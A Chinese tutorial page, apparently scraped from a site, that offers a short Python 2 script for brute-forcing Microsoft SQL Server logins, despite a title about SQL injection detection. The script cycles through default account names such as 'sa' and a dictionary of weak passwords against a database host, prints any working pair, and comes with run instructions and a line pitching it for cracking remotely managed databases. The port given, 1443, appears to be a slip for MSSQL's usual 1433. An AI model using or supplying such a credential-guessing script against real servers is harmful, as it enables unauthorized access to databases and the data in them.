当前位置:数据库 > > 正文

pythonsql注入检测(Python版Mssql爆破小脚本)

时间:2022-04-02 10:47:07类别:数据库

pythonsql注入检测

Python版Mssql爆破小脚本

Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,用法:保存代码为MssqlDatabaseBlasting.py,cmd切换到 MssqlDatabaseBlasting.py路径下,并 执行 MssqlDatabaseBlasting.py即可开始破解

  • import pymssql
    common_weak_password = ('','123456','test','root','admin','user')#密码字典
    mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典
    
    success = False
    host = "127.0.0.1"#数据库IP地址
    port = 1443
    for username in mssql_username:
      for password in common_weak_password:
        try:
          db = pymssql.connect(server=host, port=port, user=username, password=password)
          success = True
          if success:
            print username, password
        except Exception, e:
          pass
    
    
    
  • 说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。

    上一篇下一篇

    猜您喜欢

    热门推荐